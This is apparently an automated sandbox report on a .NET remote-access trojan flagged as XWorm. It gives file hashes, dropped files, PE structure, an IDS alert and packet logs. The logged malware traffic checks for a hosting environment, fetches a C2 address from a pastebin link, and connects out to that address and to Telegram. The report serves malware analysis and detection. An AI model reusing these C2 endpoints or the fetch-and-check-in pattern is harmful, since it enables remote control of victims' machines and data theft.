                                                                                                                                Preview:ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.401296006702087
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:lOaQLVa/afana3aWWanaDaXa7aKOaHa3afaDaza7a7azaXaLa3aDaranaTaDabaa:2LAKe
                                                                                                                                MD5:5643CF359CE3CFF57398674E186C8D4D
                                                                                                                                SHA1:7E7180AAAD2A14F43C9B266746A11FE19DFC6E75
                                                                                                                                SHA-256:6598FA0988D715D8120BA92E775224956912765DFA4F1BDF2ED34E19299C4600
                                                                                                                                SHA-512:426A4B3BDA4041DA3F6B815750AFCAC780F61552824D20945CF317582EDF3A40EC46C0F59D3E874DD0CB82BA47935D6AEC31CAE24A87D3508548B0E5A72BCE0B
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........@...............@...............`...R."<.....................................................................p..................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...........,...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.3650161876414235
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
                                                                                                                                MD5:346E087AE87A771402B2E38619AB7B71
                                                                                                                                SHA1:4B7EFEA99E401A5E6C0D115E2B27C48778704C13
                                                                                                                                SHA-256:82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
                                                                                                                                SHA-512:63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.335318634068108
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
                                                                                                                                MD5:3B31610BEABB5895A19C346C64C234C6
                                                                                                                                SHA1:84316C06991A51AD91C247130B615F0E56CD4D01
                                                                                                                                SHA-256:EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
                                                                                                                                SHA-512:2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.7112352075765392
Encrypted: false
SSDEEP: 192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
MD5: 5D63AFB3EA60A7655FF95B4DB1B451E0
SHA1: B5D236316CC6617071D83D7E1B4367DDA1A889B1
SHA-256: 815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
SHA-512: C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
Category: modified
Size (bytes): 69632
Entropy (8bit): 1.2795587664007206
Encrypted: false
SSDEEP: 768:hvEpP9JcY6+g4+Ga6oNpk13xIb13xIb13xIt13xI:hspP9JcY6+g4+Ga6
MD5: 74C75C1A7AD30A72673CE68DF4ECEA9C
SHA1: D72DA4125E29E8DB01101F932A48528BC5D24A82
SHA-256: BD11DE7F5F91AE7AB356FAB0851D01F1DC58493D274A5BAB344C8A98AA29AF8A
SHA-512: 9688749CFE35FB56C7A072B73F50EE84394B8177443E4BD47B27AFD991AA78BD91E806AC6F5BDD5C79699FCD9A00B11E1316C7596AFD868C4B3E9A662E8343D3
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 83072
Entropy (8bit): 4.353520935938755
Encrypted: false
SSDEEP: 384:U8RHRRwZhlR0CsRNHSRDR0mRpyR2R5MRZ2RHRpPRFrRXVRcrRb8RWRrR4QRSRQUQ:UwwZiFE3NI538LMKwZiFU
MD5: 7614591D5943EF819B01F33730B572F8
SHA1: 3FE0E0ED6FC0DA4D1A1F3D6A5565DFD9057CBAC8
SHA-256: 7B62ACBA99217024237A45C230D9CE2560B3955DA1EC307431C27FBE3E865C0F
SHA-512: 323D1A68EBE67697E83E2E166E8D6AF53C971079043185FFBA2C0D470A07EE8E6488AB4D98274DE13992BB5C47D1FF586B39033F86956D79C4DC687E2688079D
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.282820835556058
Encrypted: false
SSDEEP: 384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
MD5: 7DB7567819F7CFC6955126B8306826E6
SHA1: 45CCB1C41CA1C6E1384207444A8B84437408DF1A
SHA-256: 0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
SHA-512: FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.232783163157918
Encrypted: false
SSDEEP: 384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
MD5: 71A005B17A2D32C10709277023D447E6
SHA1: 14754F04007D539159F75D62AACC6A282CAA8D54
SHA-256: 6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
SHA-512: BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.213072277113163
Encrypted: false
SSDEEP: 384:whZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQX:wOsc6QNqObxnyS3qes
MD5: F334D4BB0C79B0D18FB3CB3892E3D8CE
SHA1: 4DC3402CD38BDB2639693C2F2A2F676DF2AD5911
SHA-256: 8844AAF909AA1BD96605F7B0CDE3459B47228CB828D8B679CF6FB8EF576C4A1C
SHA-512: D50767906323578043A3D6863AADFB72DD2ACF435DC879E07D74B7583F6CCDB430A940F1750AC343C9287AFFAF8D4E830BE7E71358B474E6B8DB870C8AB3457F
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 4.414298413407747
Encrypted: false
SSDEEP: 384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
MD5: 77D9AFD001F6BBD592C19652D671FEA3
SHA1: B87EA73299713B00D44A123C4B48636957EA90CE
SHA-256: E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
SHA-512: C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 96528
Entropy (8bit): 4.327251587633544
Encrypted: false
SSDEEP: 384:sHFRuHFReTjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoI:sl8lwFj0Dyid9s5AryVpxy/2sV
MD5: 8EBB546B814A9855225FC9BACDF7094F
SHA1: EB1D89C6571ED7E5EA78D879D70D31B02C63952D
SHA-256: 8C3F47E99BF82C008C8596DC15D7E33F4BABF06AEB258C96CFA530E49AA8572F
SHA-512: 87E0355DADB5EACF949A6EAB1E9A908BDD68377E3FC3339145862AD79F76EC850CA541B97D428B6723072B69C47323E72DE083A0B2D9CBE4F5286AB90A6794F1
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 75640
Entropy (8bit): 4.381752856539519
Encrypted: false
SSDEEP: 768:GqQqk0TXMo46/iP6f/uwu3hpRKe+PH+YekyqCcvU:zVk0TXMFfP6ipMPZdnvU
MD5: 7B19C67BA47E63F7744110C23B806565
SHA1: 2B8672FF5816044298689B4C1A7F6DBA2447729A
SHA-256: 2A4949615C1321646119DBCC46799F3C63E06CFAC5457677FEB7E74675B7443E
SHA-512: A501552AB23C398E64A97CFD9EF1191FCCF781C2BEA3C1CF705997532E8C835977E04383EA352598B75AEAF4451AF38FC8F1C889534E6E57F895D0BADA5D4EA2
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 188472
Entropy (8bit): 3.8846887556551284
Encrypted: false
SSDEEP: 3072:kNKuZNKufNKubNKuZNKufNKuugNKuMNKuZNKufNKuk:kNKuZNKufNKubNKuZNKufNKuugNKuMNm
MD5: 08321C39857863DC7EF390B859E1AF97
SHA1: AB0B6BC0AD6F44737EE86AA5EB7E6228B44CB721
SHA-256: AECF68FDF4289CB34325FF1F2C71AEB8467ADC3EA3DB39EA1DC974B89354F22B
SHA-512: 6F5120D46E605AA9E31D6C7500725014D06ACD593BF88259C30F833DD58638363CDCE39E3EC1844C7AA9EAF056D25356B0AAFAAF0C8A8B90E85F3C575A88248B
Malicious: false
Preview: (binary dump omitted)

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.973935549231534
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:RdLfpZY5A9.exe
File size:265'216 bytes
MD5:28db4677dcbbaa0a4c5adbc02c9da4f3
SHA1:e1f0199ed131a90e25204399e4e876da64ea3ba5
SHA256:b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
SHA512:718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52
SSDEEP:6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS
TLSH:E444123881DC5C93CA564BF9347A9C127F398DE6F21C9FF929222553F1E227A4488F94
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q]g.............................!... ...@....@.. ....................................@................................
Icon Hash:00928e8e8686b000
Entrypoint:0x4421ce
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x675D711D [Sat Dec 14 11:50:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x42174 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x4ce | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x46000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x401d4 | 0x40200 | 0f0ad1a44d58882aed587e4e81730f62 | False | 0.9713503594054581 | data | 7.986577451006427 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x44000 | 0x4ce | 0x600 | 97fe92f1710620c82597ccb0684cb38f | False | 0.3736979166666667 | data | 3.7224629505992812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x46000 | 0xc | 0x200 | 0e49f11adc885d635a91fc5b658a7bcb | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x440a0 | 0x244 | data | | | 0.4706896551724138
RT_MANIFEST | 0x442e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T18:53:48.901505+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.8 | 49713 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 18:53:05.484108925 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:05.717952013 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
Dec 14, 2024 18:53:05.718074083 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:05.718446970 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:05.968172073 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
Dec 14, 2024 18:53:06.891259909 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
Dec 14, 2024 18:53:06.935940981 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:44.547848940 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:44.547914028 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:44.548022985 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:44.561868906 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:44.561908960 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:45.990319967 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:45.990396976 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:45.993307114 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:45.993330956 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:45.993613005 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:46.044517994 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:46.065155029 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:46.107337952 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:46.629992962 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:46.630079985 CET | 443 | 49712 | 104.20.4.235 | 192.168.2.8
Dec 14, 2024 18:53:46.630141020 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:46.637672901 CET | 49712 | 443 | 192.168.2.8 | 104.20.4.235
Dec 14, 2024 18:53:46.723735094 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:46.847148895 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
Dec 14, 2024 18:53:46.847260952 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
Dec 14, 2024 18:53:46.867901087 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:46.867940903 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:46.868041039 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:46.868441105 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:46.868453026 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.273089886 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.273178101 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:48.275974035 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:48.275986910 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.276390076 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.277602911 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:48.319344044 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.901490927 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.901576042 CET | 443 | 49713 | 149.154.167.220 | 192.168.2.8
Dec 14, 2024 18:53:48.901678085 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:48.928366899 CET | 49713 | 443 | 192.168.2.8 | 149.154.167.220
Dec 14, 2024 18:53:53.019896984 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:53:53.139832973 CET | 37593 | 49716 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:53:53.140047073 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:53:53.175239086 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:53:53.295027971 CET | 37593 | 49716 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:06.347419977 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:54:06.472956896 CET | 37593 | 49716 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:15.043304920 CET | 37593 | 49716 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:15.043384075 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:54:25.484091997 CET | 49716 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:54:25.597511053 CET | 49718 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:54:25.604228020 CET | 37593 | 49716 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:25.717736959 CET | 37593 | 49718 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:25.720304966 CET | 49718 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:54:47.684566021 CET | 37593 | 49718 | 115.69.183.222 | 192.168.2.8
Dec 14, 2024 18:54:47.685105085 CET | 49718 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:55:27.552009106 CET | 49718 | 37593 | 192.168.2.8 | 115.69.183.222
Dec 14, 2024 18:55:27.671818972 CET | 37593 | 49718 | 115.69.183.222 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 18:53:05.336044073 CET | 51508 | 53 | 192.168.2.8 | 1.1.1.1
Dec 14, 2024 18:53:05.477273941 CET | 53 | 51508 | 1.1.1.1 | 192.168.2.8
Dec 14, 2024 18:53:44.408323050 CET | 50430 | 53 | 192.168.2.8 | 1.1.1.1
Dec 14, 2024 18:53:44.546622038 CET | 53 | 50430 | 1.1.1.1 | 192.168.2.8
Dec 14, 2024 18:53:46.724368095 CET | 55125 | 53 | 192.168.2.8 | 1.1.1.1
Dec 14, 2024 18:53:46.867073059 CET | 53 | 55125 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 18:53:05.336044073 CET | 192.168.2.8 | 1.1.1.1 | 0xea7 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:44.408323050 CET | 192.168.2.8 | 1.1.1.1 | 0xa415 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:46.724368095 CET | 192.168.2.8 | 1.1.1.1 | 0xe351 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 18:53:05.477273941 CET | 1.1.1.1 | 192.168.2.8 | 0xea7 | No error (0) | ip-api.com | (none) | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:44.546622038 CET | 1.1.1.1 | 192.168.2.8 | 0xa415 | No error (0) | pastebin.com | (none) | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:44.546622038 CET | 1.1.1.1 | 192.168.2.8 | 0xa415 | No error (0) | pastebin.com | (none) | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:44.546622038 CET | 1.1.1.1 | 192.168.2.8 | 0xa415 | No error (0) | pastebin.com | (none) | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 18:53:46.867073059 CET | 1.1.1.1 | 192.168.2.8 | 0xe351 | No error (0) | api.telegram.org | (none) | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                • pastebin.com
                                                                                                                                • api.telegram.org
                                                                                                                                • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 208.95.112.1 | 80 | 7424 | C:\ProgramData\KrnlSetupSus.exe

Timestamp: Dec 14, 2024 18:53:05.718446970 CET
Bytes transferred: 80
Direction: OUT
Data:
GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Timestamp: Dec 14, 2024 18:53:06.891259909 CET
Bytes transferred: 175
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 17:53:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 104.20.4.235 | 443 | 7424 | C:\ProgramData\KrnlSetupSus.exe

Timestamp: 2024-12-14 17:53:46 UTC
Bytes transferred: 74
Direction: OUT
Data:
GET /raw/Zx6DUkf9 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Timestamp: 2024-12-14 17:53:46 UTC
Bytes transferred: 391
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 17:53:46 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sat, 14 Dec 2024 17:53:46 GMT
Server: cloudflare
CF-RAY: 8f200e2829108ca7-EWR

Timestamp: 2024-12-14 17:53:46 UTC
Bytes transferred: 26
Direction: IN
Data Raw: 31 34 0d 0a 31 31 35 2e 36 39 2e 31 38 33 2e 32 32 32 3a 33 37 35 39 33 0d 0a
Data Ascii: 14115.69.183.222:37593

Timestamp: 2024-12-14 17:53:46 UTC
Bytes transferred: 5
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 149.154.167.220 | 443 | 7424 | C:\ProgramData\KrnlSetupSus.exe

Timestamp: 2024-12-14 17:53:48 UTC
Bytes transferred: 446
Direction: OUT
